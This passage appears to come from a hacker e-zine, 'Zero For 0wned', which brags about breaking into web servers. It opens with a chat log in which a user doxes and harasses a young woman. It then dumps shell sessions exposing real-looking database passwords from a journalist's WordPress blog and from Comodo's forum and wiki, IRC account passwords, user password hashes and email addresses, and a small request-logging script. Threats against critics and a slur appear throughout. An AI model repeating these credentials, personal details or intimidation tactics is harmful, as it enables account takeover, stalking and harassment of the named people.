you in the black dress in the hcair -[16:05] hackerillwill: chair* -[16:05] hackerillwill: ok seperate my screen name -[16:05] hackerillwill: im illwill -[16:06] hackerillwill: whats the first part -[16:06] SAMCAT03: u still arent answering the question -[16:06] hackerillwill: i just did -[16:06] hackerillwill: come on youre a college gril -[16:06] hackerillwill: girl* -[16:07] hackerillwill: MOECKEL, SAMANTHA G (Age 23) -[16:07] hackerillwill: daughter of MOECKEL, SANDRA A (Age 59) -[16:07] hackerillwill: better? -[16:08] SAMCAT03: i dont got time to be playing games -[16:08] SAMCAT03: bye -[16:08] hackerillwill: did you seperate my screen name -[16:08] hackerillwill: hackerillwill -[16:08] hackerillwill: illwill -[16:08] hackerillwill: hacker -[16:09] SAMCAT03: yes but im not playing bye -[16:09] SAMCAT03: i have better things to do then be stalked -[16:09] hackerillwill: im not stalking -[16:09] hackerillwill: i simply asked who you were -[16:09] hackerillwill: thats all i wanted to know -[16:10] hackerillwill: you could have said hi im sam im from waterbury -[16:10] SAMCAT03: ok so then u know so bue -[16:10] SAMCAT03: bye -[16:10] hackerillwill: wtf -[16:10] hackerillwill: i been to youre house -[16:10] hackerillwill: your*( -[16:10] hackerillwill: on madera -[16:11] hackerillwill: or was it oakland -[16:11] hackerillwill: we went to wilby together -[16:12] SAMCAT03: ok -[16:14] hackerillwill: u still got the same number? -[root@demon2 public_html]# cat freeillwill/shoutbox/config.php -<?php -$admin = 'illwill'; -$admin_pass = sha1('sh0utp455'); -$timezone = -5; -$show_shouts = 10; -$flood_control = 20; -?> -[root@demon2 public_html]# cat logger.php -<?php -$info = $_GET['upp']; -$datatime = date('g:i a m/d/y'); -$ipaddr = $_SERVER['REMOTE_ADDR']; -$info = str_replace("|", "<br>",$info); -$thelog = fopen($ipaddr, "a"); -fputs($thelog, "$info"); -fclose($thelog); - - -~~~~~~ - -170,000 lines of spam in illwill's spools. Here is his shortlist of friends: - -[root@demon2 illmob]# grep -A 5 'New user' mail/illmob.org/illwill | grep -v ^$ -New user registration on your blog [ill]mob: -Username: Spyd3r -E-mail: spyd3r@spyd3rs.net --- -New user registration on your blog [ill]mob: -Username: padlock -E-mail: padlock.x@gmail.com --- -New user registration on your blog [ill]mob: -Username: SomeGuy -E-mail: someguy@dodgit.com --- -New user registration on your blog [ill]mob: -Username: illwill -E-mail: xillwillx@yahoo.com --- -New user registration on your blog [ill]mob: -Username: Phist -E-mail: phist@pr0tected.org --- -New user registration on your blog [ill]mob: -Username: Lone -E-mail: lonesan@gmail.com --- -New user registration on your blog [ill]mob: -Username: pingywon -E-mail: pingywon@pingywon.com --- -New user registration on your blog [ill]mob: -Username: morning_wood -E-mail: wood@exploitlabs.com - - -~~~~~~~~~ - -Let's finish it off with some passes - -[ill]will -> nickserv: identify ircp455 -Spyd3r -> nickserv: IDENTIFY m0b1llSpyd3r -Phist -> nickserv: identify O1945y87v -coldblood -> nickserv@anonymous.services: identify coldblood867 -canr -> nickserv: identify password132 -gh0st -> nickserv@anonymous.services: IDENTIFY milliardo -padlock -> nickserv: identify 01n00bsie79 -ECB -> nickserv: identify 5919625 - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Safety on the Internet zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -To reduce our targets, we are enlisting your help to solve a problem for us. We -want you, the people of the internet, to take positive steps to reduce total -contemptability. We offer some comments and suggestions in no particular order: - -1. Don't be a dick. Alternatively, you could try getting off IRC, closing your -shitty website, and getting off the internet. - -Go watch some TV or something. - -2. Don't try to scam money out of the internet. - -3. Don't talk to Phate. - -Phate (ZF0wned in ZF02) sent us an IRC log of some guys dissing us. We're not -sure if the point was to let us know that random noobs dislike us, or to get -these people owned. All it meant to us was whether or not we should own and -publish them. We didn't bite. - -<sirukin> I better shut up before I'm owned. - -That may have been said in full sarcasm, but do you really want to take the -chance? - -Did any of you guys realise that Phate was actually going to email us that log? -Seriously, stay away from that treacherous owntard. - -4. Do not pass Go. - -5. Keep it real. Stick to what you know. - -For an obvious example, Steven J. Murdoch (PhD student) of Light Blue -Touchpaper wrote a blog entry about how Google is an expert hash-cracking -machine. Someone with any real-world experience could have Googled right away, -or searched for the hash in one of many sites that store them, and found it -that way. Or used jtr, which would crack the password much faster than his -custom Python tool. Not to mention using a real wordlist - if whatever wordlist -collection you use doesn't have "Anthony" in it, then it is pretty worthless. -Starting by writing a slow program to crack MD5s against a wordlist, and after -futily failing in that regard going to the internet, shows that LBT has less -practical experience than the most inexperienced of script kiddies (which makes -sense, considering one apparently owned them). Yet instead of the stupid blog -revealing this to much laughter and humilitation, the internet seemed to like -the post and link it everywhere. Even Bruce Schneier was fazed by it. Way to -spread ignorance around because of the respect garnered by your academic -standing. Neither LBT nor Schneier were targets, it's just one simple example -for you. - -<--- reality --------------------------------------- academia ---> - -6. Nobody cares about your blog, it exists only to occupy your time and satisfy -your feelings of influence on the world. The more flattering attention you -seek, the more negative attention you will get with it. You should probably -pack it up before someone owns your Wordpress and you have to make a post about -how you got pwned and try to pass it off as meaningless, plus display your weak -forensic techniques. - -7. There's always someone better than you, so a little modesty is a good thing. -We aren't exactly great examples here, but nobody's perfect (yet). We're -working on the perfection thing, give us time. It's Operation Supermen, and in -case you were dreaming, there's nothing homosexual about it, faggot. :P - -Somehow Thomas Ptacek found himself as the king of the security blog scene, and -eventually took this a bit far by blogging a paragraph on every fresh security -topic as if he was an ultimate authority. He wasn't exactly arrogant or unfair, -but gobbles took offense and smacked him down. Ptacek backed off and threw his -energy into Wikipedia, where he has made thousands of edits now. He's even done -some good work, successfully campaigning for the deletion of a lot of bullshit -"hacker" biographies like those on our Whitedust founders! He basically took -his authoritative position to Wikipedia, which is ok for now because Wikipedia -lacks anybody else talented to do that work. Currently it's just Myles Long of -CDC using his Wikipedia administrator authority to write a lot of complementary -articles on CDC members, so Ptacek is a welcome relief. (Ptacek and Matasano -were not targets, just examples.) - -8. Similarly to #3, do not email us with taunts or insults. - -Maybe it's cool if you detail your fair opinions to friends, but if you just -ask us to own you, you might just get owned! Also if you run a website and you -do not want to be humiliated, do not let members diss us or others. Kids like -tripple generally are not worth owning, but Blackcode might be. Dig it? - -We likes jokes though. Jokes > taunts. We have a good one about three g00ns -walking into a bar. :P - -9. Do not have dynamic content on your website. You're probably not smart -enough and committed enough to secure it. Most likely nobody gives a shit about -it anyways. - -10. Bugs Bunny is fucking timeless. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Robert Lemos zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -Well after Bambenek in the last issue im sure you will be delighted to know we decided -we needed to own another whitehat blogger. This time it is Mr Bobby "Bologna" Lemos! -Otherwise known as securityfocus' Robert Lemos! - -Anyway, we mainly target these guys to publish the zine on their blog, -but here's a mini hax log anyway! - -$ ls -la /home/robertle/robertlemos.com/html/ -total 272 -drwxr-sr-x 8 robertle robertle 4096 Apr 25 13:56 . -drwx--s--x 4 robertle robertle 4096 Mar 26 2007 .. -drwxr-sr-x 2 robertle robertle 4096 Apr 16 2007 cgi-bin --rw-r--r-- 1 robertle robertle 169 May 24 2007 .htaccess -drwxr-sr-x 3 robertle robertle 4096 Apr 16 2007 images --rw-r--r-- 1 robertle robertle 94 Apr 25 13:34 index.php --rw-r--r-- 1 robertle robertle 15127 Apr 25 13:34 license.txt -drwxr-sr-x 2 robertle robertle 4096 Apr 16 2007 public --rw-r--r-- 1 robertle robertle 7638 Apr 25 13:34 readme.html -drwxr-sr-x 7 robertle robertle 4096 Apr 25 13:36 wp-admin --rw-r--r-- 1 robertle robertle 32776 Apr 25 13:36 wp-app.php --rw-r--r-- 1 robertle robertle 129 Apr 25 13:36 wp-atom.php --rw-r--r-- 1 robertle robertle 1026 Apr 25 13:36 wp-blog-header.php --rw-r--r-- 1 robertle robertle 2919 Apr 25 13:36 wp-comments-post.php --rw-r--r-- 1 robertle robertle 153 Apr 25 13:36 wp-commentsrss2.php --rw-r--r-- 1 robertle robertle 1308 Apr 25 13:36 wp-config.php -drwxr-sr-x 4 robertle robertle 4096 Apr 25 13:36 wp-content --rw-r--r-- 1 robertle robertle 851 Apr 25 13:37 wp-cron.php --rw-r--r-- 1 robertle robertle 120 Apr 25 13:37 wp-feed.php -drwxr-sr-x 4 robertle robertle 4096 Apr 25 13:39 wp-includes --rw-r--r-- 1 robertle robertle 1529 Apr 25 13:39 wp-links-opml.php --rw-r--r-- 1 robertle robertle 16439 Apr 25 13:39 wp-login.php --rw-r--r-- 1 robertle robertle 6077 Apr 25 13:39 wp-mail.php --rw-r--r-- 1 robertle robertle 296 Apr 25 13:39 wp-pass.php --rw-r--r-- 1 robertle robertle 190 Apr 25 13:39 wp-rdf.php --rw-r--r-- 1 robertle robertle 251 Apr 25 13:39 wp-register.php --rw-r--r-- 1 robertle robertle 129 Apr 25 13:39 wp-rss2.php --rw-r--r-- 1 robertle robertle 127 Apr 25 13:39 wp-rss.php --rw-r--r-- 1 robertle robertle 14493 Apr 25 13:39 wp-settings.php --rw-r--r-- 1 robertle robertle 3123 Apr 25 13:39 wp-trackback.php --rw-r--r-- 1 robertle robertle 68155 Apr 25 13:39 xmlrpc.php - -## -# Plain old WP! -## -$ cat /home/robertle/robertlemos.com/html/wp-config.php -// ** MySQL settings ** // -define('DB_NAME', 'robertle_wordpress'); // The name of the database -define('DB_USER', 'robertle_wordpre'); // Your MySQL username -define('DB_PASSWORD', 'hy78DRh2'); // ...and password -define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value -define('DB_CHARSET', 'utf8'); -define('DB_COLLATE', ''); - -// Change SECRET_KEY to a unique phrase. You won't have to remember it later, -// so make it long and complicated. You can visit http://api.wordpress.org/secret-key/1.0/ -// to get a secret key generated for you, or just make something up. -define('SECRET_KEY', - '+pR=X+zOk&#&97_U0U\\[!I+F&f,ST^`faRC@2w)roiH) LNPUH 0CRXm]Wgl:~Js'); - // Change this to a unique phrase. - -// You can have multiple installations in one database if you give each a unique prefix -$table_prefix = 'wp_'; // Only numbers, letters, and underscores please! - -// Change this to localize WordPress. A corresponding MO file for the -// chosen language must be installed to wp-content/languages. -// For example, install de.mo to wp-content/languages and set WPLANG to 'de' -// to enable German language support. -define ('WPLANG', ''); - -/* That's all, stop editing! Happy blogging. */ - -define('ABSPATH', dirname(__FILE__).'/'); -require_once(ABSPATH.'wp-settings.php'); -?> - -$ cat lemos-DB-users.txt.trim -(1,'admin','8bc58176c2315cc6f5d078336e8550ed','administrator','feedback@robertlemos.com', -(2,'michelle','55e55cba279c487e6a082a5f4f22a356','michelle','michelle@aywonline.com', -(3,'ethan0l','d4f1a08e8137ab11f7e87e1c919f6de1','ethan0l','elindsey@gmail.com', -(4,'severus','6aef40dc8b3fc23f18e053ea27437fcb','severus','jeff@severus.org','http://www.severus.org', -(5,'n3td3v','153634f00aa78e6b7779a9ec2a576c30','n3td3v','xploitable@gmail.com', -(6,'amit000usa','5af4937b9bbdf2953fba91f07f9c665e','amit000usa','amit000usa@gmail.com', -(7,'Richard1038','6134040b0289338f508a83fdaa1f8f4a','richard1038','r_ohap.lemosr07346@zoemail.net', -(8,'puresin','b441b1cae8102e72dc36685383d55db5','puresin','suresync@walla.com', -(9,'Gavriel','d2f9212ec793c0cbc8240ae06a04eab7','gavriel','gavriel73@hotmail.com', -(10,'suresync','7d422f71ddacf7e6d60c39f506088e20','suresync','suresync@gmail.com', -(11,'CellDet','5824deefcb052d532111a14e7d238449','celldet','lreiber@cellphonedetectives.com', -(12,'Daniel','fcd7e7fe6b365629517faa40b5ad61f8','daniel','notsofresh@netzero.net', -(13,'granny6x','8e4275eb9539bd19106ef3a54090b8fa','granny6x','mikarl@starpower.net', -(14,'rucdoc','830aec6cc0ee531b040e5f845a9adffb','rucdoc','rucdoc@yahoo.com', -(15,'hughormond','46c7e325e3710cfc9fe99a28a468dd49','hughormond','hugh.ormond@rte.ie', -(16,'ana','5d554bc5f3d2cd182cdd0952b1fb87ca','ana','ana_papaya@hotmail.com', -(17,'pat_mitchell','f87f2e6355adef077158670cd2d47e29','pat_mitchell','pat_mitchell0@lycos.com', -(18,'xdfsd45oi','31ba65a1961059295890f8805999b607','xdfsd45oi','johnsmithuswe@gmail.com', -(19,'Nyah_Troxell','9e2a06ce3a557a679e9f0b3fe231a962','nyah_troxell','gena_allegator@inbox.ru', -(20,'Bush','d437c1b6cdf0bc98b8bc2988dc6e20a0','bush','main@yandex.com', -(21,'Mosterboy','818470e08c063b778442db1b6957eb19','mosterboy','Mosterboyg4321@mail.com', -(22,'Aline','310d2c15caddd67c384c3fdeca903985','aline','juusttingla@yahoo.com', -(23,'Jigueprurne','1c218be9cddb7ef2e00ebbb1718a1b81','jigueprurne','attaisymn@kremenchug.ws', -(24,'OEIISJJEsjjz','c99776606756971538b223e0272cc900','oeiisjjesjjz','lesbiansexpics@hotpop.com', -(25,'myBoxfy','56ef82f4ec32a3ceed77c7cb8cb00040','myboxfy','myboxfy@bluebottle.com', - -Wow, even n3td3v has an account there! Sweet, we've hit the big time. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Every Zine Needs a Song zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -Superhacker Paul McCartney volunteered this tribute song. I actually thought it was -kinda crappy, but with all the effort going into it (he said he went back in time and -wrote it for us) we just couldn't turn him down. But when he started rambling on about -time warp I hung up the phone. - -Don't Pass Me By - - A Tribute to a FED - -I listen for your footsteps -Coming up the drive -Listen for your footsteps -But they don't arrive -Waiting for your knock dear -On my old front door -I don't hear it -Does it mean you don't love me any more. - -I hear the clock a'ticking -On the mantel shelf -See the hands a'moving -But I'm by myself -I wonder where you are tonight -And why I'm by myself -I don't see you -Does it mean you don't love me any more. - -Don't pass me by don't make me cry don't make me blue -'Cause you know darling I love only you -You'll never know it hurt me so -How I hate to see you go -Don't pass me by don't make me cry - -I'm sorry that I doubted you -I was so unfair -You were in a car crash -And you lost your hair -You said that you would be late -About an hour or two -I said that's alright I'm waiting here -Just waiting to hear from you. - -~~ - -Paul's a hoot. A real nut. - -Disclaimer: - -Opinions expressed here by Paul McCartney are not representative of the views -of Zero For 0wned or any of its members. Feds can stay the fuck away. - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Comodo zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -Comodo is founded by "security architects" who have been in the business of -running ./nessus for years. Today they still run ./nessus for fun and profit - but they also offer their "security solutions" world wide to over 200,000 - customers in more than 100 countries, securing 500,000+ businesses and -individuals! Comodo - Creating Trust Online (TM). - -They deploy ./security-solutions for a nominal fee so *you* can rest assured -that nobody will ./h4x0r your network. They can sell you flashy banners for -your site which say "COMODO HACKER PROOF; TESTED $date" and "Identity assured -up to $1 mil" Comodo is kind enough to let us download their "products" for - free. Even though my windows VMware crashed when I ran both "Comodo -Firewall Pro" and "Comodo Anti-Malware" I am assured those programs are 100% -authentic and hacker-safe, tested $date, and the best solution against evil - hackers. Take the no risk HackerProof challenge today! - -Once you have bought a SSL certificate from comodo and installed it on your -website you are assured that your site is 100% hacker proof and nobody can -./sniff it. Because Comodo offers the *best* solutions, they run their own - products on their corporate website and forum. Since they're the BEST, no -evil hacker can compromise their server otherwise they'd have to give refunds - to over 200,000 customers in more than 100 countries, securing 500,000+ -businesses and individuals! And the flashy banners which said "HackerProof" - are just flashy banners right? - -apache@tcfweb1 /var/www $ ls -al -total 0 -drwxr-xr-x 8 apache root 240 Dec 3 14:21 . -drwxr-xr-x 14 root root 360 Dec 21 2006 .. -drwxr-xr-x 5 root root 184 Oct 22 22:12 blog.comodo.com -drwxr-xr-x 5 root root 120 Aug 22 2007 forums.comodo.com -drwxr-xr-x 6 apache apache 144 Dec 1 2006 localhost -drwxr-xr-x 4 root root 96 Jan 29 15:34 melih.com -drwxr-xr-x 2 1023 users 80 Jun 9 2007 outage -drwxr-xr-x 6 root root 184 Nov 20 21:36 wiki.comodo.com - -apache@tcfweb1 /var/www/forums.comodo.com/htdocs $ cat Settings.php -<?php -# Garbage cutage -########## Forum Info ########## -$mbname = 'Welcome to the Comodo Forum'; # The name of your forum. -$language = 'english-utf8'; # The default language file set for the forum. -$boardurl = 'http://forums.comodo.com'; # URL to your forum's folder. - (without the trailing /!) -$webmaster_email = 'forumadmin@comodo.com'; # Email address to send - emails from. (like noreply@yourdomain.com.) -$cookiename = 'SMFCookie10'; # Name of the cookie to set for authentication. -########## Database Info ########## -$db_server = 'csql'; -$db_name = 'forum'; -$db_user = 'smf'; -$db_passwd = 'cosmicjam8'; # that's a fine secure and authentic password -$db_prefix = 'smf_'; -$db_persist = 0; -$db_error_send = 0; - -########## Directories/Files ########## -# Note: These directories do not have to be changed unless you move things. -$boarddir = '/var/www/forums.comodo.com/htdocs'; # The absolute -path to the forum's folder. (not just '.'!) -$sourcedir = '/var/www/forums.comodo.com/htdocs/Sources'; # Path -to the Sources directory. - -########## Error-Catching ########## -# Note: You shouldn't touch these settings. -$db_last_error = 1181233707; - -# Make sure the paths are correct... at least try to fix them. -if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . -'/agreement.txt')) -$boarddir = dirname(__FILE__); -if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources')) -$sourcedir = $boarddir . '/Sources'; - -?> - -apache@tcfweb1 /var/www/wiki.comodo.com/htdocs $ cat LocalSettings.php -<?php -# Garbage cutage -## Uncomment this to disable output compression -# $wgDisableOutputCompression = true; - -$wgSitename = "ComodoWiki"; - -## The URL base path to the directory containing the wiki; -## defaults for all runtime URL paths are based off of this. -$wgScriptPath = ""; -$wgScriptExtension = ".php"; - -# short urls -$wgArticlePath = "/$1"; -$wgUsePathInfo = false; - -## For more information on customizing the URLs please see: -## http://www.mediawiki.org/wiki/Manual:Short_URL - -$wgEnableEmail = true; -$wgEnableUserEmail = true; - -$wgEmergencyContact = "wikiadmin@comodo.com"; -$wgPasswordSender = "wikiadmin@comodo.com"; - -## For a detailed description of the following switches see -## http://www.mediawiki.org/wiki/Extension:Email_notification -## and http://www.mediawiki.org/wiki/Extension:Email_notification -## There are many more options for fine tuning available see -## /includes/DefaultSettings.php -## UPO means: this is also a user preference option -$wgEnotifUserTalk = true; # UPO -$wgEnotifWatchlist = true; # UPO -$wgEmailAuthentication = true; - -$wgDBtype = "mysql"; -$wgDBserver = "csql"; -$wgDBname = "wikidb"; -$wgDBuser = "wikiuser"; -$wgDBpassword = "cocokiki"; # that's just great - -# MySQL specific settings -$wgDBprefix = ""; - -# MySQL table options to use during installation or update -$wgDBTableOptions = "TYPE=InnoDB"; - -# Experimental charset support for MySQL 4.1/5.0. -$wgDBmysql5 = false; - -# Postgres specific settings -$wgDBport = "5432"; -$wgDBmwschema = "mediawiki"; -$wgDBts2schema = "public"; -$wgEnableUploads = true; -$wgUseImageMagick = true; -$wgImageMagickConvertCommand = "/usr/bin/convert"; - -## If you want to use image uploads under safe mode, -## create the directories images/archive, images/thumb and -## images/temp, and make them all writable. Then uncomment -## this, if it's not already uncommented: -$wgHashedUploadDirectory = false; - -## If you have the appropriate support software installed -## you can enable inline LaTeX equations: -$wgUseTeX = false; - -$wgLocalInterwiki = $wgSitename; - -$wgLanguageCode = "en"; - -$wgProxyKey = -"4bc73d050ca087d60a5d792d2bca0064321d82cf1be09e1abf02eb3aa95c6c1f"; - -apache@tcfweb1 /var/www/outage $ /sbin/ifconfig -eth0 Link encap:Ethernet HWaddr 00:16:3E:49:C6:9D - inet addr:192.168.36.171 Bcast:192.168.36.255 Mask:255.255.255.0 - inet6 addr: fe80::216:3eff:fe49:c69d/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:61905650 errors:0 dropped:0 overruns:0 frame:0 - TX packets:56896749 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:36185145376 (34508.8 Mb) TX bytes:37393006820 (35660.7 Mb) - -eth0:0 Link encap:Ethernet HWaddr 00:16:3E:49:C6:9D - inet addr:192.168.36.170 Bcast:192.168.36.255 Mask:255.255.255.0 - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:61905650 errors:0 dropped:0 overruns:0 frame:0 - TX packets:56896749 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:36185145376 (34508.8 Mb) TX bytes:37393006820 (35660.7 Mb) - -lo Link encap:Local Loopback - inet addr:127.0.0.1 Mask:255.0.0.0 - inet6 addr: ::1/128 Scope:Host - UP LOOPBACK RUNNING MTU:16436 Metric:1 - RX packets:6692253 errors:0 dropped:0 overruns:0 frame:0 - TX packets:6692253 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:0 - RX bytes:1658253609 (1581.4 Mb) TX bytes:1658253609 (1581.4 Mb) - -apache@tcfweb1 /var/www/outage $ ps auxww -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -root 1 0.0 0.0 2680 584 ? Ss Mar18 0:00 init [3] -root 2 0.0 0.0 0 0 ? S Mar18 0:00 [migration/0] -root 3 0.0 0.0 0 0 ? SN Mar18 0:00 [ksoftirqd/0] -root 4 0.0 0.0 0 0 ? S< Mar18 0:00 [events/0] -root 5 0.0 0.0 0 0 ? S< Mar18 0:00 [khelper] -root 6 0.0 0.0 0 0 ? S< Mar18 0:00 [kthread] -root 8 0.0 0.0 0 0 ? S< Mar18 0:00 [xenwatch] -root 9 0.0 0.0 0 0 ? S< Mar18 0:00 [xenbus] -root 59 0.0 0.0 0 0 ? S< Mar18 0:00 [kblockd/0] -root 62 0.0 0.0 0 0 ? S< Mar18 0:00 [kseriod] -root 80 0.0 0.0 0 0 ? S Mar18 0:00 [pdflush] -root 81 0.0 0.0 0 0 ? S Mar18 0:10 [pdflush] -root 82 0.0 0.0 0 0 ? S< Mar18 0:00 [kswapd0] -root 83 0.0 0.0 0 0 ? S< Mar18 0:00 [aio/0] -root 215 0.0 0.0 0 0 ? S< Mar18 0:00 [kpsmoused] -root 218 0.0 0.0 0 0 ? S< Mar18 0:00 [reiserfs/0] -root 294 0.0 0.0 7164 596 ? S<s Mar18 0:00 /sbin/udevd --daemon -root 575 0.0 0.0 0 0 ? S< Mar18 0:00 [khubd] -root 1954 0.0 0.0 5896 780 ? Ss Mar18 0:03 /usr/sbin/syslogd -root 1964 0.0 0.0 2680 308 ? Ss Mar18 0:00 /usr/sbin/klogd -c 3 -2 -bin 2419 0.0 0.0 3732 416 ? Ss Mar18 0:00 /sbin/portmap -root 2532 0.0 0.0 19140 848 ? Ss Mar18 0:00 /usr/sbin/sshd -root 2588 0.0 0.0 2704 408 ? Ss Mar18 0:00 /usr/bin/svscan /service -root 2592 0.0 0.0 2536 368 ? S Mar18 0:00 supervise qmail-smtpd -root 2593 0.0 0.0 2532 364 ? S Mar18 0:00 supervise log -root 2594 0.0 0.0 2532 364 ? S Mar18 0:00 supervise qmail-send -root 2595 0.0 0.0 2536 368 ? S Mar18 0:00 supervise log -qmaild 2596 0.0 0.0 3780 580 ? S Mar18 0:00 /usr/bin/tcpserver --p -v -R -x /etc/tcprules.d/tcp.qmail-smtp.cdb -c 40 -u 201 -g 200 0.0.0.0 smtp /var/qmail/bin/qmail-smtpd -qmails 2597 0.0 0.0 2724 464 ? S Mar18 0:03 qmail-send -qmaill 2598 0.0 0.0 2548 364 ? S Mar18 0:00 /usr/bin/multilog -t s2500000 n10 /var/log/qmail/qmail-send -qmaill 2599 0.0 0.0 2544 364 ? S Mar18 0:00 /usr/bin/multilog -t s2500000 n10 /var/log/qmail/qmail-smtpd -root 2607 0.0 0.0 2676 404 ? S Mar18 0:00 qmail-lspawn # -Uncomment the next line for .forward -support?#|dot-forward .forward?./.maildir/ -qmailr 2608 0.0 0.0 2804 664 ? S Mar18 0:00 qmail-rspawn -qmailq 2609 0.0 0.0 2664 404 ? S Mar18 0:00 qmail-clean -root 2856 0.0 0.8 38832 13312 ? SLs Mar18 0:14 heartbeat: master control process -nobody 2911 0.0 0.4 32100 6580 ? SL Mar18 0:00 heartbeat: FIFO reader -nobody 2912 0.0 0.4 32228 6708 ? SL Mar18 0:01 heartbeat: write: ucast eth0 -nobody 2913 0.0 0.4 32228 6708 ? SL Mar18 0:00 heartbeat: read: ucast eth0 -nobody 2914 0.0 0.4 32228 6708 ? SL Mar18 0:00 heartbeat: write: ucast eth0 -nobody 2915 0.0 0.4 32228 6708 ? SL Mar18 0:05 heartbeat: read: ucast eth0 -nobody 2916 0.0 0.4 32228 6708 ? SL Mar18 0:02 heartbeat: write: ping 192.168.36.1 -nobody 2917 0.0 0.4 32228 6708 ? SL Mar18 0:01 heartbeat: read: ping 192.168.36.1 -ntp 2918 0.0 0.0 10780 856 ? S Mar18 0:00 /usr/sbin/ntpd -s -root 2919 0.0 0.0 10780 568 ? Ss Mar18 0:00 /usr/sbin/ntpd -s -root 2977 0.0 0.3 25300 5108 ? S Mar18 0:04 -/usr/sbin/snmpd -p /var/run/snmpd.pid -root 3033 0.0 0.0 9096 744 ? Ss Mar18 0:00 /usr/sbin/cron -infra 3446 0.0 0.0 6336 704 ? S Mar18 0:00 /bin/sh ./runbb.sh -infra 3449 0.0 0.0 1496 496 ? S Mar18 0:01 -/home/infra/bbc/bin/bbrun -a /home/infra/bbc/ext/bb-memfree.sh -infra 3450 0.0 0.0 6336 700 ? S Mar18 0:00 /bin/sh ./runbb.sh -infra 3453 0.0 0.0 6336 672 ? S Mar18 0:00 /bin/sh ./runbb.sh -infra 3454 0.0 0.0 1496 500 ? S Mar18 0:01 -/home/infra/bbc/bin/bbrun -a /home/infra/bbc/bin/bb-local.sh -root 3466 0.0 0.0 5892 784 tty1 Ss+ Mar18 0:00 /sbin/agetty 38400 tty1 linux -root 3467 0.0 0.0 5888 784 tty2 Ss+ Mar18 0:00 /sbin/agetty 38400 tty2 linux -root 3468 0.0 0.0 5888 784 tty3 Ss+ Mar18 0:00 /sbin/agetty 38400 tty3 linux -root 3469 0.0 0.0 5888 780 tty4 Ss+ Mar18 0:00 /sbin/agetty 38400 tty4 linux -root 3470 0.0 0.0 5888 784 tty5 Ss+ Mar18 0:00 /sbin/agetty 38400 tty5 linux -root 3471 0.0 0.0 5888 780 tty6 Ss+ Mar18 0:00 /sbin/agetty 38400 tty6 linux -infra 3578 0.0 0.0 1496 500 ? S Mar18 0:00 -/home/infra/bbc/bin/bbrun -a /home/infra/bbc/ext/bb-swap.sh -apache 16145 0.0 0.1 10764 1948 ? Ss 22:48 0:00 /usr/sbin/apache -i -apache 16278 4.7 4.9 556664 78568 ? Sl 22:49 0:44 -/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d -/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start -apache 16468 4.6 4.8 554316 76260 ? Sl 22:50 0:41 -/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d -/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start -apache 18795 3.8 3.7 377444 59548 ? Sl 23:04 0:02 -/usr/sbin/apache2 -D DEFAULT_VHOST -D PHP5 -D INFO -D SSL -d -/usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start -apache 18959 0.0 0.6 440788 9592 